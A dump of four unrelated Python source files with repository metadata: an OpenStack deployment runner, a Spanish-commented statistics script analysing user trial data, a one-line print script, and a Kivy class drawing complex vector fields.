4a85b52ba9f626ebd48354c7af531849353182ac | e84446227d42d9cf93ddbdd057ac58af73e96f11 | /aasemble/deployment/runner.py | 36f07658c4fdaeabbde834e75361b00e3f05a304 | [] | no_license | pljensen/python-aasemble.deployment | 335d76133a0327695f7afe227864a31f80ab0151 | ef42ee4157f1ead79fff75a5c10ecddc761d8d01 | refs/heads/master | 2020-04-02T00:26:34.930860 | 2015-10-25T21:40:28 | 2015-10-25T21:40:28 | 48,762,074 | 0 | 0 | null | 2015-12-29T18:48:45 | 2015-12-29T18:48:44 | null | UTF-8 | Python | false | false | 28,972 | py | #!/usr/bin/env python
#
# Copyright 2015 Reliance Jio Infocomm, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import ConfigParser
import logging
import os
import pipes
import select
import subprocess
import sys
import time
import yaml
from neutronclient.common.exceptions import Conflict as NeutronConflict
from novaclient.exceptions import Conflict as NovaConflict
from aasemble.deployment import utils, exceptions
def load_yaml(f='.aasemble.yaml'):
with open(f, 'r') as fp:
return yaml.load(fp)
def load_mappings(f='.aasemble.mappings.ini'):
with open(f, 'r') as fp:
parser = ConfigParser.SafeConfigParser()
parser.readfp(fp)
mappings = {}
for t in ('flavors', 'networks', 'images', 'routers'):
mappings[t] = {}
if parser.has_section(t):
mappings[t].update(parser.items(t))
return mappings
def find_weak_refs(stack):
images = set()
flavors = set()
networks = set()
for node_name, node in stack['nodes'].items():
images.add(node['image'])
flavors.add(node['flavor'])
networks.update([n['network'] for n in node['networks']])
dynamic_networks = set()
for network_name, network in stack.get('networks', {}).items():
dynamic_networks.add(network_name)
return images, flavors, networks-dynamic_networks
def list_refs(args, stdout=sys.stdout):
stack = load_yaml(args.stack)
images, flavors, networks = find_weak_refs(stack)
if args.tmpl:
cfg = ConfigParser.SafeConfigParser()
cfg.add_section('images')
cfg.add_section('flavors')
for image in images:
cfg.set('images', image, '<missing value>')
for flavor in flavors:
cfg.set('flavors', flavor, '<missing value>')
cfg.write(stdout)
else:
stdout.write('Images:\n ')
if images:
stdout.write(' '.join(images))
else:
stdout.write('None')
stdout.write('\n\nFlavors:\n ')
if flavors:
stdout.write(' '.join(flavors))
else:
stdout.write('None')
stdout.write('\n')
def run_cmd_once(shell_cmd, real_cmd, environment, deadline):
proc = subprocess.Popen(shell_cmd,
env=environment,
shell=True,
stdin=subprocess.PIPE)
stdin = real_cmd + '\n'
while True:
if stdin:
_, rfds, xfds = select.select([], [proc.stdin], [proc.stdin], 1)
if rfds:
proc.stdin.write(stdin[0])
stdin = stdin[1:]
if not stdin:
proc.stdin.close()
if xfds:
if proc.stdin.feof():
stdin = ''
if proc.poll() is not None:
if proc.returncode == 0:
return True
else:
raise exceptions.CommandFailedException(stdin)
if deadline and time.time() > deadline:
if proc.poll() is None:
proc.kill()
raise exceptions.CommandTimedOutException(stdin)
def get_creds_from_env():
d = {}
d['username'] = os.environ['OS_USERNAME']
d['password'] = os.environ['OS_PASSWORD']
d['auth_url'] = os.environ['OS_AUTH_URL']
d['tenant_name'] = os.environ['OS_TENANT_NAME']
return d
class Node(object):
def __init__(self, name, info, runner, keypair=None, userdata=None):
self.record_resource = lambda *args, **kwargs: None
self.name = name
self.info = info
self.runner = runner
self.keypair = keypair
self.userdata = userdata
self.server_id = None
self.fip_ids = set()
self.ports = []
self.server_status = None
self.image = None
self.flavor = None
self.attempts_left = runner.retry_count + 1
if self.info.get('image') in self.runner.mappings.get('images', {}):
self.info['image'] = self.runner.mappings['images'][self.info['image']]
if self.info.get('flavor') in self.runner.mappings.get('flavors', {}):
self.info['flavor'] = self.runner.mappings['flavors'][self.info['flavor']]
def poll(self, desired_status = 'ACTIVE'):
"""
This one poll nova and return the server status
"""
if self.server_status != desired_status:
self.server_status = self.runner.get_nova_client().servers.get(self.server_id).status
return self.server_status
def clean(self):
"""
Cleaner: This method remove server, fip, port etc.
We could keep fip and may be ports (ports are getting deleted with current
neutron client), but that is going to be bit more complex to make sure
right port is assigned to right fip etc, so atm, just removing them.
"""
for fip_id in self.fip_ids:
self.runner.delete_floatingip(fip_id)
self.fip_ids = set()
for port in self.ports:
self.runner.delete_port(port['id'])
self.ports = []
server = self.runner.delete_server(self.server_id)
self.server_id = None
def create_nics(self, networks):
nics = []
for eth_idx, network in enumerate(networks):
port_name = '%s_eth%d' % (self.name, eth_idx)
port_info = self.runner.create_port(port_name, network['network'],
[self.runner.secgroups[secgroup] for secgroup in network.get('securitygroups', [])])
self.runner.record_resource('port', port_info['id'])
self.ports.append(port_info)
if network.get('assign_floating_ip', False):
fip_id, fip_address = self.runner.create_floating_ip()
self.runner.associate_floating_ip(port_info['id'], fip_id)
port_info['floating_ip'] = fip_address
self.fip_ids.add(fip_id)
nics.append(port_info['id'])
return nics
def build(self):
if self.flavor is None:
self.flavor = self.runner.get_nova_client().flavors.get(self.info['flavor'])
nics = [{'port-id': port_id} for port_id in self.create_nics(self.info['networks'])]
volume = self.runner.create_volume(size=self.info['disk'],
image_ref=self.info['image'])
while volume.status != 'available':
time.sleep(3)
volume = self.runner.get_cinder_client().volumes.get(volume.id)
bdm = {'vda': '%s:::1' % (volume.id,)}
server = self.runner.get_nova_client().servers.create(self.name, image=None,
block_device_mapping=bdm,
flavor=self.flavor, nics=nics,
key_name=self.keypair, userdata=self.userdata)
self.runner.record_resource('server', server.id)
self.server_id = server.id
self.attempts_left -= 1
@property
def floating_ip(self):
for port in self.ports:
if 'floating_ip' in port:
return port['floating_ip']
class DeploymentRunner(object):
def __init__(self, config=None, suffix=None, mappings=None, key=None,
record_resource=None, retry_count=0):
self.cfg = config
self.suffix = suffix
self.mappings = mappings or {}
self.key = key
self.retry_count = retry_count
self.record_resource = lambda *args, **kwargs: None
self.conncache = {}
self.networks = {}
self.secgroups = {}
self.nodes = {}
def get_keystone_session(self):
from keystoneclient import session as keystone_session
from keystoneclient.auth.identity import v2 as keystone_auth_id_v2
if 'keystone_session' not in self.conncache:
self.conncache['keystone_auth'] = keystone_auth_id_v2.Password(**get_creds_from_env())
self.conncache['keystone_session'] = keystone_session.Session(auth=self.conncache['keystone_auth'])
return self.conncache['keystone_session']
def get_keystone_client(self):
from keystoneclient.v2_0 import client as keystone_client
if 'keystone' not in self.conncache:
ks = self.get_keystone_session()
self.conncache['keystone'] = keystone_client.Client(session=ks)
return self.conncache['keystone']
def get_nova_client(self):
import novaclient.client as novaclient
if 'nova' not in self.conncache:
kwargs = {'session': self.get_keystone_session()}
if 'OS_REGION_NAME' in os.environ:
kwargs['region_name'] = os.environ['OS_REGION_NAME']
self.conncache['nova'] = novaclient.Client("2", **kwargs)
return self.conncache['nova']
def get_cinder_client(self):
import cinderclient.client as cinderclient
if 'cinder' not in self.conncache:
kwargs = {'session': self.get_keystone_session()}
if 'OS_REGION_NAME' in os.environ:
kwargs['region_name'] = os.environ['OS_REGION_NAME']
self.conncache['cinder'] = cinderclient.Client('1', **kwargs)
return self.conncache['cinder']
def get_neutron_client(self):
import neutronclient.neutron.client as neutronclient
if 'neutron' not in self.conncache:
kwargs = {'session': self.get_keystone_session()}
if 'OS_REGION_NAME' in os.environ:
kwargs['region_name'] = os.environ['OS_REGION_NAME']
self.conncache['neutron'] = neutronclient.Client('2.0', **kwargs)
return self.conncache['neutron']
def _map_network(self, network):
if network in self.mappings.get('networks', {}):
return self.mappings['networks'][network]
elif network in self.networks:
return self.networks[network]
return network
def detect_existing_resources(self):
neutron = self.get_neutron_client()
suffix = self.add_suffix('')
if suffix:
strip_suffix = lambda s:s[:-len(suffix)]
else:
strip_suffix = lambda s:s
network_name_by_id = {}
for network in neutron.list_networks()['networks']:
if network['name'].endswith(suffix):
base_name = strip_suffix(network['name'])
if base_name in self.networks:
raise exceptions.DuplicateResourceException('Network', network['name'])
self.networks[base_name] = network['id']
network_name_by_id[network['id']] = base_name
raw_ports = [{'id': port['id'],
'fixed_ip': port['fixed_ips'][0]['ip_address'],
'mac': port['mac_address'],
'network_name': network_name_by_id.get(port['network_id'], port['network_id'])}
for port in neutron.list_ports()['ports']]
ports_by_id = {port['id']: port for port in raw_ports}
ports_by_mac = {port['mac']: port for port in raw_ports}
for fip in neutron.list_floatingips()['floatingips']:
port_id = fip['port_id']
if not port_id:
continue
port = ports_by_id[port_id]
port['floating_ip'] = fip['floating_ip_address']
for secgroup in neutron.list_security_groups()['security_groups']:
if secgroup['name'].endswith(suffix):
base_name = strip_suffix(secgroup['name'])
if base_name in self.secgroups:
raise exceptions.DuplicateResourceException('Security Group', secgroup['name'])
self.secgroups[base_name] = secgroup['id']
nova = self.get_nova_client()
for node in nova.servers.list():
if node.name.endswith(suffix):
base_name = strip_suffix(node.name)
if base_name in self.nodes:
raise exceptions.DuplicateResourceException('Node', node.name)
self.nodes[base_name] = Node(node.name, {}, self)
for address in node.addresses.values():
mac = address[0]['OS-EXT-IPS-MAC:mac_addr']
port = ports_by_mac[mac]
self.nodes[base_name].ports.append(port)
def delete_volume(self, uuid):
cc = self.get_cinder_client()
cc.volumes.delete(uuid)
def delete_port(self, uuid):
nc = self.get_neutron_client()
nc.delete_port(uuid)
def delete_network(self, uuid):
nc = self.get_neutron_client()
nc.delete_network(uuid)
def delete_router(self, uuid):
nc = self.get_neutron_client()
nc.delete_router(uuid)
def delete_subnet(self, uuid):
nc = self.get_neutron_client()
try:
nc.delete_subnet(uuid)
except NeutronConflict, e:
# This is probably due to the router port. Let's find it.
router_found = False
for port in nc.list_ports(device_owner='network:router_interface')['ports']:
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == uuid:
router_found = True
nc.remove_interface_router(port['device_id'],
{'subnet_id': uuid})
break
if router_found:
# Let's try again
nc.delete_subnet(uuid)
else:
# Ok, we didn't find a router, so clearly this is a different
# problem. Just re-raise the original exception.
raise
def delete_secgroup(self, uuid):
nc = self.get_neutron_client()
nc.delete_security_group(uuid)
def delete_secgroup_rule(self, uuid):
nc = self.get_neutron_client()
nc.delete_security_group_rule(uuid)
def delete_floatingip(self, uuid):
nc = self.get_neutron_client()
nc.delete_floatingip(uuid)
def delete_keypair(self, name):
nc = self.get_nova_client()
nc.keypairs.delete(name)
def delete_server(self, uuid):
nc = self.get_nova_client()
nc.servers.delete(uuid)
def create_volume(self, size, image_ref):
cc = self.get_cinder_client()
attempts_left = self.retry_count + 1
while attempts_left > 0:
try:
volume = cc.volumes.create(size=size,
imageRef=image_ref)
self.record_resource('volume', volume.id)
return volume
except Exception, e:
if attempts_left == 0:
raise
print e
attempts_left -= 1
def create_port(self, name, network, secgroups):
nc = self.get_neutron_client()
network_id = self._map_network(network)
port = {'name': name,
'admin_state_up': True,
'network_id': network_id,
'security_groups': secgroups}
port = nc.create_port({'port': port})['port']
return {'id': port['id'],
'fixed_ip': port['fixed_ips'][0]['ip_address'],
'mac': port['mac_address'],
'network_name': network}
def create_keypair(self, name, keydata):
nc = self.get_nova_client()
attempts_left = self.retry_count + 1
while attempts_left > 0:
try:
nc.keypairs.create(name, keydata)
break
except NovaConflict:
return
except Exception, e:
if attempts_left == 0:
raise
print e
attempts_left -= 1
def find_floating_network(self, ):
nc = self.get_neutron_client()
networks = nc.list_networks(**{'router:external': True})
return networks['networks'][0]['id']
def create_floating_ip(self):
nc = self.get_neutron_client()
floating_network = self.find_floating_network()
floatingip = {'floating_network_id': floating_network}
floatingip = nc.create_floatingip({'floatingip': floatingip})
self.record_resource('floatingip', floatingip['floatingip']['id'])
return (floatingip['floatingip']['id'],
floatingip['floatingip']['floating_ip_address'])
def associate_floating_ip(self, port_id, fip_id):
nc = self.get_neutron_client()
nc.update_floatingip(fip_id, {'floatingip': {'port_id': port_id}})
def create_network(self, name, info):
nc = self.get_neutron_client()
network = {'name': name, 'admin_state_up': True}
network = nc.create_network({'network': network})
self.record_resource('network', network['network']['id'])
subnet = {"network_id": network['network']['id'],
"ip_version": 4,
"cidr": info['cidr'],
"name": name}
subnet = nc.create_subnet({'subnet': subnet})['subnet']
self.record_resource('subnet', subnet['id'])
if '*' in self.mappings.get('routers', {}):
nc.add_interface_router(self.mappings['routers']['*'], {'subnet_id': subnet['id']})
return network['network']['id']
def create_security_group(self, base_name, info):
nc = self.get_neutron_client()
name = self.add_suffix(base_name)
secgroup = {'name': name}
secgroup = nc.create_security_group({'security_group': secgroup})['security_group']
self.record_resource('secgroup', secgroup['id'])
self.secgroups[base_name] = secgroup['id']
for rule in (info or []):
secgroup_rule = {"direction": "ingress",
"ethertype": "IPv4",
"port_range_min": rule['from_port'],
"port_range_max": rule['to_port'],
"protocol": rule['protocol'],
"security_group_id": secgroup['id']}
if 'source_group' in rule:
secgroup_rule['remote_group_id'] = self.secgroups.get(rule['source_group'], rule['source_group'])
else:
secgroup_rule['remote_ip_prefix'] = rule['cidr']
secgroup_rule = nc.create_security_group_rule({'security_group_rule': secgroup_rule})
self.record_resource('secgroup_rule', secgroup_rule['security_group_rule']['id'])
def build_env_prefix(self, details):
env_prefix = ''
def add_environment(key, value):
return '%s=%s ' % (pipes.quote(key), pipes.quote(value or ''))
env_prefix += add_environment('ALL_NODES',
' '.join([self.add_suffix(s) for s in self.nodes.keys()]))
for node_name, node in self.nodes.iteritems():
if node.info.get('export', False):
for port in node.ports:
key = 'AASEMBLE_%s_%s_fixed' % (node_name, port['network_name'])
value = port['fixed_ip']
env_prefix += add_environment(key, value)
if 'environment' in details:
for key, value in details['environment'].items():
if value.startswith('$'):
value = os.environ.get(value[1:])
env_prefix += add_environment(key, value)
return env_prefix
def shell_step(self, details, environment=None):
env_prefix = self.build_env_prefix(details)
cmd = self.shell_step_cmd(details, env_prefix)
if details.get('total-timeout', False):
overall_deadline = time.time() + utils.parse_time(details['total-timeout'])
else:
overall_deadline = None
if details.get('timeout', False):
individual_exec_limit = utils.parse_time(details['timeout'])
else:
individual_exec_limit = None
if details.get('retry-delay', False):
retry_delay = utils.parse_time(details['retry-delay'])
else:
retry_delay = 0
def wait():
time.sleep(retry_delay)
# Four settings matter here:
# retry-if-fails: True/False
# retry-delay: Time to wait between retries
# timeout: Max time per command execution
# total-timeout: How long time to spend on this in total
while True:
if individual_exec_limit:
deadline = time.time() + individual_exec_limit
if overall_deadline:
if deadline > overall_deadline:
deadline = overall_deadline
elif overall_deadline:
deadline = overall_deadline
else:
deadline = None
try:
run_cmd_once(cmd, details['cmd'], environment, deadline)
break
except exceptions.CommandFailedException:
if details.get('retry-if-fails', False):
wait()
continue
raise
except exceptions.CommandTimedOutException:
if details.get('retry-if-fails', False):
if time.time() + retry_delay < deadline:
wait()
continue
raise
def shell_step_cmd(self, details, env_prefix=''):
if details.get('type', None) == 'remote':
fip_addr = self.nodes[details['node']].floating_ip
return 'ssh -o StrictHostKeyChecking=no ubuntu@%s "%s bash"' % (fip_addr, env_prefix)
else:
return '%s bash' % (env_prefix,)
def add_suffix(self, s):
if self.suffix:
return '%s_%s' % (s, self.suffix)
else:
return s
def provision_step(self, details):
stack = load_yaml(details['stack'])
if self.key:
keypair_name = self.add_suffix('pubkey')
self.create_keypair(keypair_name, self.key)
self.record_resource('keypair', keypair_name)
else:
keypair_name = None
if 'userdata' in details:
with open(details['userdata'], 'r') as fp:
userdata = fp.read()
else:
userdata = None
pending_nodes = set()
def wait():
time.sleep(5)
for base_network_name, network_info in stack['networks'].items():
if base_network_name in self.networks:
continue
network_name = self.add_suffix(base_network_name)
self.networks[base_network_name] = self.create_network(network_name,
network_info)
for base_secgroup_name, secgroup_info in stack['securitygroups'].items():
if base_secgroup_name in self.secgroups:
continue
self.create_security_group(base_secgroup_name, secgroup_info)
for base_node_name, node_info in stack['nodes'].items():
if 'number' in node_info:
count = node_info.pop('number')
for idx in range(1, count+1):
node_name = '%s%d' % (base_node_name, idx)
name = self._create_node(node_name, node_info,
keypair_name=keypair_name, userdata=userdata)
if name:
pending_nodes.add(name)
else:
name = self._create_node(base_node_name, node_info,
keypair_name=keypair_name, userdata=userdata)
if name:
pending_nodes.add(name)
while True:
pending_nodes = self._poll_pending_nodes(pending_nodes)
if not pending_nodes:
break
wait()
def _create_node(self, base_name, node_info, keypair_name, userdata):
if base_name in self.nodes:
return
node_name = self.add_suffix(base_name)
self.nodes[base_name] = Node(node_name, node_info,
runner=self,
keypair=keypair_name,
userdata=userdata)
self.nodes[base_name].build()
return base_name
def _poll_pending_nodes(self, pending_nodes):
done = set()
for name in pending_nodes:
state = self.nodes[name].poll()
if state == 'ACTIVE':
done.add(name)
elif state == 'ERROR':
if self.retry_count:
self.nodes[name].clean()
if self.nodes[name].attempts_left:
self.nodes[name].build()
continue
raise exceptions.ProvisionFailedException()
return pending_nodes.difference(done)
def deploy(self, name):
for step in self.cfg[name]:
step_type = step.keys()[0]
details = step[step_type]
func = getattr(self, '%s_step' % step_type)
func(details)
def main(argv=sys.argv[1:], stdout=sys.stdout):
def deploy(args):
cfg = load_yaml(args.cfg)
if args.key:
with open(args.key, 'r') as fp:
key = fp.read()
dr = DeploymentRunner(config=cfg,
suffix=args.suffix,
mappings=load_mappings(args.mappings),
key=key,
retry_count=args.retry_count)
if args.cont:
dr.detect_existing_resources()
if args.cleanup:
with open(args.cleanup, 'a+') as cleanup:
def record_resource(type_, id):
cleanup.write('%s: %s\n' % (type_, id))
dr.record_resource = record_resource
dr.deploy(args.name)
else:
dr.deploy(args.name)
def cleanup(args):
dr = DeploymentRunner()
with open(args.log, 'r') as fp:
lines = [l.strip() for l in fp]
lines.reverse()
for l in lines:
resource_type, uuid = l.split(': ')
func = getattr(dr, 'delete_%s' % resource_type)
try:
func(uuid)
except Exception, e:
print e
parser = argparse.ArgumentParser(description='Run deployment')
subparsers = parser.add_subparsers(help='Subcommand help')
list_refs_parser = subparsers.add_parser('list-refs',
help='List symbolic resources')
list_refs_parser.set_defaults(func=list_refs)
list_refs_parser.add_argument('--tmpl', action='store_true',
help='Output template ini file')
list_refs_parser.add_argument('stack', help='YAML file describing stack')
deploy_parser = subparsers.add_parser('deploy', help='Perform deployment')
deploy_parser.set_defaults(func=deploy)
deploy_parser.add_argument('--cfg', default='.aasemble.yaml',
help='Deployment config file')
deploy_parser.add_argument('--suffix', help='Resource name suffix')
deploy_parser.add_argument('--mappings', help='Resource map file')
deploy_parser.add_argument('--key', help='Public key file')
deploy_parser.add_argument('--cleanup', help='Cleanup file')
deploy_parser.add_argument('--retry-count', type=int, default=0,
help='Retry RETRY-COUNT times before giving up provisioning a VM')
deploy_parser.add_argument('--incremental', dest='cont', action='store_true',
help="Don't create resources if identically named ones already exist")
deploy_parser.add_argument('name', help='Deployment to perform')
cleanup_parser = subparsers.add_parser('cleanup', help='Clean up')
cleanup_parser.set_defaults(func=cleanup)
cleanup_parser.add_argument('log', help='Clean up log (generated by deploy)')
args = parser.parse_args(argv)
if args.func:
args.func(args)
if __name__ == '__main__':
main()
| [
"Soren.Hansen@ril.com"
] | Soren.Hansen@ril.com |
7d21469797bd6dd19ae18a5104d38e6915cec052 | d1acce814517a237d9770be067269804b52ebecf | /tests.py | 67e605b2a12bb27e831bfaa08fb6698402d81d62 | [] | no_license | gpfernandezflorio/incc | 4f1d42c29eacaa8cd5521ed9f498d7638b005106 | 63d304145c65ba6f1910ce2453e65d1548026d33 | refs/heads/master | 2020-11-25T00:28:25.008786 | 2016-10-31T10:59:43 | 2016-10-31T10:59:43 | 66,871,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,158 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Ir: Índice de relación en un trial = 1/tiempo.
# Ir_uxc: Índice de relación de un usuario respecto a una de las cuatro clases = Sum Ir de los trials de ese usuario en los que eligió la clase c.
# Ir_cxt: Índice de relación de un choice respecto a un target = Sum Ir de los trials con el target t en los que se eligió el choice c.
# Ir_l1xl2: Índice de relación de un logo respecto a otro = Sum Ir de los trials con target l1 en los que se eligió a l2.
# Irr_uxc: Índice de relación reativa de un usuario respecto a una de las cuatro clases = Ir_uxc / cantidad de trials que el usuario eligió la clase c.
# Irr_cxt: Índice de relación reativa de un choice respecto a un target = Ir_cxt / cantidad de veces que apareció el choice c
# Ordenar el randoms por tamaño de globos.
# El de pTarget, hacerlo de dos dimensiones: En el eje y poner las 4 clases y en el eje z (color/tamaño) el índice NORMALIZADO.
# Definir índice normalizado.
import sys, math, random, datetime, Image
import numpy as np
import matplotlib.pyplot as plt
from matplotlib._png import read_png
from scipy import stats
from statsmodels.stats.multicomp import pairwise_tukeyhsd
from statsmodels.stats.multicomp import MultiComparison
if __name__ == '__main__':
f = open("trials.txt", 'r')
obj = {'0':"CONCEPTO",'1':"LETRA/FORMA",'2':"COLOR",'3':"RUIDO",'4':"?"}
trials_c = {}
users = []
temp_users = []
user = -1
alls = {obj['0']:0,obj['1']:0,obj['2']:0,obj['3']:0,"TOTAL":0}
randoms = {}
rand_int = 0
# TODO: agregar al último gráfico el promedio (y la varianza) de las elecciones de los usuarios.
avg_users = [[],[],[],[]]
avg_users_quantity = [[],[],[],[]]
avg_users_time = [[],[],[],[]]
for l in f:
if l.startswith("NEW USER"):
# Cambio de Usuario
user = user+1
users.append({obj['0']:0,obj['1']:0,obj['2']:0,obj['3']:0,"TOTAL":0})
temp_users.append([])
avg_users[0].append(0)
avg_users[1].append(0)
avg_users[2].append(0)
avg_users[3].append(0)
avg_users_quantity[0].append(0)
avg_users_quantity[1].append(0)
avg_users_quantity[2].append(0)
avg_users_quantity[3].append(0)
avg_users_time[0].append(0)
avg_users_time[1].append(0)
avg_users_time[2].append(0)
avg_users_time[3].append(0)
elif l[0] == '>':
# Random trial
trial = l[1:].split('|')
time = float(trial[5])
if not trial[0] in randoms:
randoms[trial[0]] = [rand_int,{}]
rand_int += 1
if not trial[1] in randoms[trial[0]][1]:
randoms[trial[0]][1][trial[1]] = [1,1/time]
else:
randoms[trial[0]][1][trial[1]][0] += 1
randoms[trial[0]][1][trial[1]][1] += 1/time
for i in range(2,5):
if not trial[i] in randoms[trial[0]][1]:
randoms[trial[0]][1][trial[i]] = [1,0]
else:
randoms[trial[0]][1][trial[1]][0] += 1
elif l[0] != '<':
# Set trial
trial = l.split('|')
time = float(trial[6])
if not trial[0] in trials_c:
trials_c[trial[0]] = {}
# Elegida:
if not trial[1] in trials_c[trial[0]]:
trials_c[trial[0]][trial[1]] = [1,1/time,trial[2]]
else:
# Le sumo 1 a cant apariciones
trials_c[trial[0]][trial[1]][0] += 1
# Le sumo 1 a cant elegida
trials_c[trial[0]][trial[1]][1] += 1/time
if trials_c[trial[0]][trial[1]][2] == '4':
trials_c[trial[0]][trial[1]][2] = trial[2]
# El resto
for j in range(3,6):
if not trial[j] in trials_c[trial[0]]:
# Le sumo 1 a cant apariciones
trials_c[trial[0]][trial[j]] = [1,0,'4']
else:
# Le sumo 1 a cant apariciones
trials_c[trial[0]][trial[j]][0] += 1
temp_users[user].append(trial[2])
users[user][obj[trial[2]]] += 1/time
users[user]["TOTAL"] += 1
alls[obj[trial[2]]] += 1/time
alls["TOTAL"] += 1
avg_users[int(trial[2])][user] += 1/time
avg_users_quantity[int(trial[2])][user] += 1
avg_users_time[int(trial[2])][user] += time
colors = ['r','g','b','gold','c','purple','darkorange','darkblue','olive','mediumpurple','lightcoral','yellowgreen','saddlebrown','dodgerblue','lightpink','darkgrey','k']
# F, p = stats.f_oneway(avg_users_time[0],avg_users_time[1], avg_users_time[2], avg_users_time[3])
# print "Relativo tiempo"
# print p
# F, p = stats.f_oneway(avg_users[0],avg_users[1], avg_users[2], avg_users[3])
# print "Anova RI"
# print p
F, p = stats.f_oneway(avg_users_quantity[0],avg_users_quantity[1], avg_users_quantity[2], avg_users_quantity[3])
print "Anova Cantidad de elecciones de un usuario por clase"
print p
print("-------------------------------------------------------------------------")
print("*************************************************************************")
print("-------------------------------------------------------------------------")
arrayAux1 = np.concatenate((np.array(avg_users_quantity[0]), np.array(avg_users_quantity[1])), axis=0)
arrayAux2 = np.concatenate((np.array(avg_users_quantity[2]), np.array(avg_users_quantity[3])), axis=0)
arrayTotal = np.concatenate((arrayAux1, arrayAux2), axis=0)
arr1 = np.array(map(lambda x: "concepto", range(len(avg_users_quantity[0]))))
arr2 = np.array(map(lambda x: "letra/forma", range(len(avg_users_quantity[1]))))
arr3 = np.array(map(lambda x: "color", range(len(avg_users_quantity[2]))))
arr4 = np.array(map(lambda x: "ruido", range(len(avg_users_quantity[3]))))
arrAux1 = np.concatenate((arr1, arr2), axis=0)
arrAux2 = np.concatenate((arr3, arr4), axis=0)
arrTotal = np.concatenate((arrAux1, arrAux2), axis=0)
mc = MultiComparison(arrayTotal, arrTotal)
result = mc.tukeyhsd()
print(result)
print(mc.groupsunique)
print("-------------------------------------------------------------------------")
print("*************************************************************************")
print("-------------------------------------------------------------------------")
avg_users_jugadas = map(lambda x: users[x]["TOTAL"], range(len(users)))
avg_users_relativos0 = map(lambda x: avg_users[0][x]/avg_users_jugadas[x], range(len(users)))
avg_users_relativos1 = map(lambda x: avg_users[1][x]/avg_users_jugadas[x], range(len(users)))
avg_users_relativos2 = map(lambda x: avg_users[2][x]/avg_users_jugadas[x], range(len(users)))
avg_users_relativos3 = map(lambda x: avg_users[3][x]/avg_users_jugadas[x], range(len(users)))
arrayAux0 = np.concatenate((np.array(avg_users_relativos0), np.array(avg_users_relativos1)), axis=0)
arrayAux1 = np.concatenate((np.array(avg_users_relativos2), np.array(avg_users_relativos3)), axis=0)
arrayTotal = np.concatenate((arrayAux0, arrayAux1), axis=0)
mc = MultiComparison(arrayTotal, arrTotal)
result = mc.tukeyhsd()
F, p = stats.f_oneway(avg_users_relativos0,avg_users_relativos1, avg_users_relativos2, avg_users_relativos3)
print "Anova Cantidad de elecciones de un usuario por clase / cantidad de jugadas del usuario"
print p
print(result)
print(mc.groupsunique)
#chi2, p, dof, expected = stats.chi2_contingency(np.array([avg_users_relativos0, avg_users_relativos1, avg_users_relativos2, avg_users_relativos3]))
#print p
#normalizamos la distribucion tomando logaritmo del tiempo
| [
"cyntiab83@gmail.com"
] | cyntiab83@gmail.com |
787702abe9f8792377f89128766d2139c6471d3b | 4440b2d241d939e4b0a8f6c6abcf4f526d8c056c | /firstpython.py | 8db0959598a6bbdcfad6700809b5ba11993efeae | [] | no_license | XmingoZ/allthatjazz | 2516d820957cfaf378622a96db36b56a7f5b0477 | f19b2a3bffac0f59ba561f2d612c070b4ac75c3f | refs/heads/main | 2023-04-22T09:18:46.498594 | 2021-05-06T13:29:42 | 2021-05-06T13:29:42 | 364,875,435 | 0 | 0 | null | 2021-05-06T13:29:43 | 2021-05-06T10:43:55 | Python | UTF-8 | Python | false | false | 44 | py | #display the output
print "new python file"
| [
"noreply@github.com"
] | noreply@github.com |
a95d050d78505518fd176341ec20f39c0b7204e2 | f1e86be4aa5b6889b02642d8b554f3ee770db203 | /Field.py | 7b21c6c733368230e62d849eb4f09b26ee0a2ee8 | [] | no_license | solavrov/cfield | 02ae193d7563024a9bca54397592628a77d44251 | f8eff587643bf9ae10a7efa6be1ea5527e139af2 | refs/heads/master | 2020-03-30T04:42:01.263695 | 2018-10-03T13:37:00 | 2018-10-03T13:37:00 | 150,757,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | from kivy.uix.widget import Widget
from kivy.graphics import Line, Ellipse, Color, Triangle, Rectangle
from kivy.vector import Vector
from OVector import OVector
from math import inf
from kivy.core.window import Window
import cdf
import rgb
class Field(Widget):
def __init__(self, field_function, low_left: Vector, high_right: Vector, step, paint_accuracy=20,
back_color=Color(0, 0, 0, 1), **kwargs):
super().__init__(**kwargs)
self.field = []
self.shift = Vector(0, 0)
self.stretch = Vector(0, 0)
self.draw_background(back_color)
self.calc(field_function, low_left, high_right, step)
self.paint(paint_accuracy)
self.normalize(step * 0.8)
def map_ov(self, ov: OVector):
return OVector(self.shift + self.stretch * ov.p, self.stretch * ov.v, ov.color)
def map_v(self, v: Vector):
return Vector(self.shift + self.stretch * v)
def add_vector(self, ov: OVector):
self.field.append(ov)
def draw_field(self):
for ov in self.field:
ov = self.map_ov(ov)
e = ov.v.rotate(90).normalize()
tri_points = tuple(ov.end()) + tuple(ov.p + 2 * e) + tuple(ov.p - 2 * e)
tri = Triangle(points=tri_points)
dot = Ellipse(pos=(ov.p - Vector(2, 2)), size=(5, 5))
self.canvas.add(ov.color)
self.canvas.add(tri)
self.canvas.add(dot)
def calc(self, field_function, low_left: Vector, high_right: Vector, step: float):
y = low_left.y
while y <= high_right.y:
x = low_left.x
while x <= high_right.x:
z = complex(x, y)
try:
v = Vector(field_function(z).real, field_function(z).imag)
except ZeroDivisionError:
v = Vector(inf, inf)
ov = OVector(Vector(x, y), v)
self.add_vector(ov)
x = round(x + step, 14)
y = round(y + step, 14)
self.stretch = Vector(Window.size[0] / (high_right.x - low_left.x),
Window.size[1] / (high_right.y - low_left.y))
self.shift = Vector(-self.stretch.x * low_left.x, -self.stretch.y * low_left.y)
def paint(self, accuracy):
mods = []
for ov in self.field:
mod = ov.len()
if mod != inf:
mods.append(mod)
max_mod = max(mods)
norm_mods = [e / max_mod for e in mods]
cdf_nodes = cdf.get_cdf_nodes(norm_mods, accuracy)
for ov in self.field:
mod = ov.len()
if mod != inf:
try:
t = mod / max_mod
except ZeroDivisionError:
t = 0
u = cdf.interp(t, cdf_nodes)
ov.color = rgb.rgb1(u)
else:
ov.color = Color(1, 0, 0, 1)
def normalize(self, unit):
for ov in self.field:
ov.normalize(unit)
